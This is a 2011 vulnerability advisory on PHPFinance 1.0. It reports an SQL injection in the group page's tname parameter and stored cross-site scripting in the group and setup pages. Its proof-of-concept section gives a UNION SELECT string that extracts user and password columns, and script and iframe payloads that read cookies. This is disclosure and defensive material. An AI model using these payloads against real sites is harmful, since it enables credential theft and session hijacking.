Document Title:
===============
PHP Finance v1.0 - Multiple Web Vulnerabilities



Release Date:
=============
2011-07-16


Vulnerability Laboratory ID (VL-ID):
====================================
103


Product & Service Introduction:
===============================
PHPFinance is a web based financial management program that can be used for income/expense flow managing , 
reporting and logging using a database well suited small enterprises and home users. PHPFinance is written mainly 
in PHP with small javascript additions and SQL infrastructure , its data can be manually added or imported from 
Paypal and Adsense and exported to CSV and OFX. PHPFinance alows you to see statisitics , visualizations , and 
features progress line graphs , procentage pie graphs , and comparative graphs of income and expenses plus many more.

(Copy of the Vendor Homepage http://phpfinance.sourceforge.net/about.php)


Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple Web Vulnerabilities on the PHP-Finance Applikation.



Vulnerability Disclosure Timeline:
==================================
2011-00-00:	Vendor Notification
2011-00-00:	Vendor Response/Feedback
2011-00-00:	Vendor Fix/Patch
2011-00-00:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
A SQl-Injection vulnerability is detected on the famous php-finance web application.
The vulnerability allows an attacker to inject own sql statements on affected vulnerable application(dbms).

Vulnerable Modules:
			[+] Group - tname


1.2
Multiple persistent input validation vulnerabilities are detected on application-side.
The vulnerability allows an attacker to manipulate specific requests or web application content.
Its also possible to hijack higher privileged user account sessions.

Vulnerable Modules:
			[+] Group Configuration
			[+] Setup Display


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...

File: 		group.php
Para: 		?tname=
Example:	-%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10%20concat(user,0x3a,pass),11,12,13,14,%20from%20xxxxx%20 ... /*



File:		group.php & setup.php
Para:		?del=1&tname=[
Modules:	PHPFinance group page, Create new group/category  &  Amount+Note
Example String:	>"<iframe src=http://test.de>  or >"<script>alert(document.cookie)</script><div style="1


Solution - Fix & Patch:
=======================
Use the prepared statement class & escape to parse the sql injection vulnerability stable.


Security Risk:
==============
The security risk of the sql injection vulnerability is estimated as critical.
the security risk of the persistent validation vulnerabilities are estimated as medium.


Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory